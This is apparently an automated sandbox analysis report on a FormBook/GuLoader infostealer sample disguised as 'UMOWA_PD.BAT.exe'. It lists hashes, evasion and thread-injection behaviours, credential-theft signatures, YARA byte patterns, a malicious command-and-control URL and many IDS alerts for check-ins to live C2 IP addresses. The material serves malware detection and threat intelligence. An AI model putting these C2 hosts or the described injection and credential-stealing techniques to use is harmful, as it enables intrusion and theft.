Windows Analysis Report
UMOWA_PD.BAT.exe

Overview

General Information

Sample name: UMOWA_PD.BAT.exe
Analysis ID: 1517964
MD5: d1f841d041c915f803dbe6c15b19c510
SHA1: 85190628be4d7ed332737df38a580455e29155e1
SHA256: 5af56bd9193c8379584ced6a37121e011007666ef1d77518e3e5ea52ec2ca7c5
Infos:

Detection

FormBook, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
Yara detected FormBook
Yara detected GuLoader
Found direct / indirect Syscall (likely to bypass EDR)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses ipconfig to lookup or modify the Windows network settings
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64native
  • UMOWA_PD.BAT.exe (PID: 2644 cmdline: "C:\Users\user\Desktop\UMOWA_PD.BAT.exe" MD5: D1F841D041C915F803DBE6C15B19C510)
    • UMOWA_PD.BAT.exe (PID: 2788 cmdline: "C:\Users\user\Desktop\UMOWA_PD.BAT.exe" MD5: D1F841D041C915F803DBE6C15B19C510)
      • giLTwJlyLWpfb.exe (PID: 4308 cmdline: "C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • ipconfig.exe (PID: 2264 cmdline: "C:\Windows\SysWOW64\ipconfig.exe" MD5: 3A3B9A5E00EF6A3F83BF300E2B6B67BB)
          • giLTwJlyLWpfb.exe (PID: 3276 cmdline: "C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 2368 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: FA9F4FC5D7ECAB5A20BF7A9D1251C851)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000004.00000002.19061585968.0000000002F90000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000004.00000002.19061585968.0000000002F90000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2bf70:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x1401f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000005.00000002.19981281087.0000000000AD0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000005.00000002.19981281087.0000000000AD0000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x3a1af:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x2225e:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.15388452470.00000000000B0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
        No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-09-25T09:54:24.115194+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.11.20 | 49755 | 185.86.211.137 | 80 | TCP


        AV Detection

        Source: http://www.tempatmudisini01.click/iydt/?Xb3xI=Devrpt6CKIMDtnVDPR2S8x3yMYRId44n2aQLSTimhEZ/Y4z+iB4Tcv9O6cZB31p1Mi5MvPz0n4i/4vc8VuesM/xDDO+6C7ZbX/5xARUztqgUqGu06GFp6xk=&O4bP=9dRH6ZfHbJX, Avira URL Cloud: Label: malware
        Source: http://www.tempatmudisini01.click/iydt/, Avira URL Cloud: Label: malware
        Source: http://tempatmudisini01.click/iydt/?Xb3xI=Devrpt6CKIMDtnVDPR2S8x3yMYRId44n2aQLSTimhEZ/Y4z, Avira URL Cloud: Label: malware
        Source: Yara match, File source: 00000004.00000002.19061585968.0000000002F90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000005.00000002.19981281087.0000000000AD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000002.00000002.15388452470.00000000000B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000004.00000002.19061692398.0000000002FE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000003.00000002.19982524217.0000000004990000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000002.00000002.15405766333.0000000035DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: UMOWA_PD.BAT.exe, Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: unknown, HTTPS traffic detected: 185.86.211.137:443 -> 192.168.11.20:49756 version: TLS 1.2
        Source: UMOWA_PD.BAT.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: ipconfig.pdb source: UMOWA_PD.BAT.exe, 00000002.00000002.15394881294.0000000003A77000.00000004.00000020.00020000.00000000.sdmp, UMOWA_PD.BAT.exe, 00000002.00000002.15395201478.0000000003AA2000.00000004.00000020.00020000.00000000.sdmp, giLTwJlyLWpfb.exe, 00000003.00000003.18849446171.0000000000D1B000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: ipconfig.pdbGCTL source: UMOWA_PD.BAT.exe, 00000002.00000002.15394881294.0000000003A77000.00000004.00000020.00020000.00000000.sdmp, UMOWA_PD.BAT.exe, 00000002.00000002.15395201478.0000000003AA2000.00000004.00000020.00020000.00000000.sdmp, giLTwJlyLWpfb.exe, 00000003.00000003.18849446171.0000000000D1B000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdb source: UMOWA_PD.BAT.exe, 00000002.00000001.15100533752.0000000000649000.00000020.00000001.01000000.00000005.sdmp
        Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: giLTwJlyLWpfb.exe, 00000003.00000000.15312438170.000000000009E000.00000002.00000001.01000000.00000007.sdmp, giLTwJlyLWpfb.exe, 00000005.00000002.19979533628.000000000009E000.00000002.00000001.01000000.00000007.sdmp
        Source: Binary string: wntdll.pdbUGP source: UMOWA_PD.BAT.exe, 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, UMOWA_PD.BAT.exe, 00000002.00000003.15298219117.00000000338F7000.00000004.00000020.00020000.00000000.sdmp, UMOWA_PD.BAT.exe, 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmp, UMOWA_PD.BAT.exe, 00000002.00000003.15301885907.0000000033AAC000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000002.19061934116.00000000031F0000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000003.15391899316.0000000003046000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000003.15388516950.0000000002E9D000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000002.19061934116.000000000331D000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: UMOWA_PD.BAT.exe, UMOWA_PD.BAT.exe, 00000002.00000002.15405036272.0000000033C60000.00000040.00001000.00020000.00000000.sdmp, UMOWA_PD.BAT.exe, 00000002.00000003.15298219117.00000000338F7000.00000004.00000020.00020000.00000000.sdmp, UMOWA_PD.BAT.exe, 00000002.00000002.15405036272.0000000033D8D000.00000040.00001000.00020000.00000000.sdmp, UMOWA_PD.BAT.exe, 00000002.00000003.15301885907.0000000033AAC000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, ipconfig.exe, 00000004.00000002.19061934116.00000000031F0000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000003.15391899316.0000000003046000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000003.15388516950.0000000002E9D000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000002.19061934116.000000000331D000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdbUGP source: UMOWA_PD.BAT.exe, 00000002.00000001.15100533752.0000000000649000.00000020.00000001.01000000.00000005.sdmp
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exe, Code function: 0_2_0040687E FindFirstFileW,FindClose,0_2_0040687E
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exe, Code function: 0_2_00405C2D GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C2D
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exe, Code function: 0_2_00402910 FindFirstFileW,0_2_00402910
        Source: C:\Windows\SysWOW64\ipconfig.exe, Code function: 4x nop then mov ebx, 00000004h, 4_2_030E04E8

        Networking

        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49758 -> 13.248.169.48:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49764 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49775 -> 54.67.87.110:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49763 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49789 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49789 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49773 -> 84.32.84.32:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49768 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49778 -> 194.58.112.174:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49773 -> 84.32.84.32:80
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49761 -> 13.248.169.48:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49761 -> 13.248.169.48:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49767 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49757 -> 208.91.197.27:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49757 -> 208.91.197.27:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49774 -> 54.67.87.110:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49766 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49787 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49783 -> 38.47.207.146:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49798 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49780 -> 194.58.112.174:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49776 -> 54.67.87.110:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49811 -> 137.175.33.56:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49792 -> 162.213.249.216:80
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49781 -> 194.58.112.174:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49794 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49781 -> 194.58.112.174:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49782 -> 38.47.207.146:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49786 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49820 -> 13.248.169.48:80
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49785 -> 38.47.207.146:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49785 -> 38.47.207.146:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49790 -> 162.213.249.216:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49759 -> 13.248.169.48:80
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49801 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49801 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49784 -> 38.47.207.146:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49762 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49795 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49800 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49765 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49765 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49793 -> 162.213.249.216:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49793 -> 162.213.249.216:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49807 -> 133.130.35.90:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49802 -> 103.21.221.4:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49803 -> 103.21.221.4:80
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49769 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49777 -> 54.67.87.110:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49777 -> 54.67.87.110:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49806 -> 133.130.35.90:80
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49805 -> 103.21.221.4:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49808 -> 133.130.35.90:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49805 -> 103.21.221.4:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49810 -> 137.175.33.56:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49779 -> 194.58.112.174:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49796 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49817 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49817 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49769 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49799 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49828 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49815 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49836 -> 54.67.87.110:80
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49797 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49797 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49838 -> 54.67.87.110:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49838 -> 54.67.87.110:80
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49809 -> 133.130.35.90:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49809 -> 133.130.35.90:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49804 -> 103.21.221.4:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49837 -> 54.67.87.110:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49812 -> 137.175.33.56:80
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49818 -> 208.91.197.27:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49818 -> 208.91.197.27:80
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49813 -> 137.175.33.56:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49788 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49813 -> 137.175.33.56:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49841 -> 194.58.112.174:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49791 -> 162.213.249.216:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49814 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49819 -> 13.248.169.48:80
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49830 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49830 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49850 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49850 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49816 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49822 -> 13.248.169.48:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49822 -> 13.248.169.48:80
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49834 -> 84.32.84.32:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49834 -> 84.32.84.32:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49823 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49825 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49824 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49827 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49842 -> 194.58.112.174:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49842 -> 194.58.112.174:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49839 -> 194.58.112.174:80
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49826 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49826 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49840 -> 194.58.112.174:80
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49846 -> 38.47.207.146:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49846 -> 38.47.207.146:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49843 -> 38.47.207.146:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49835 -> 54.67.87.110:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49847 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49848 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49829 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49844 -> 38.47.207.146:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49845 -> 38.47.207.146:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49849 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49771 -> 84.32.84.32:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49821 -> 13.248.169.48:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49770 -> 84.32.84.32:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49833 -> 84.32.84.32:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49831 -> 84.32.84.32:80
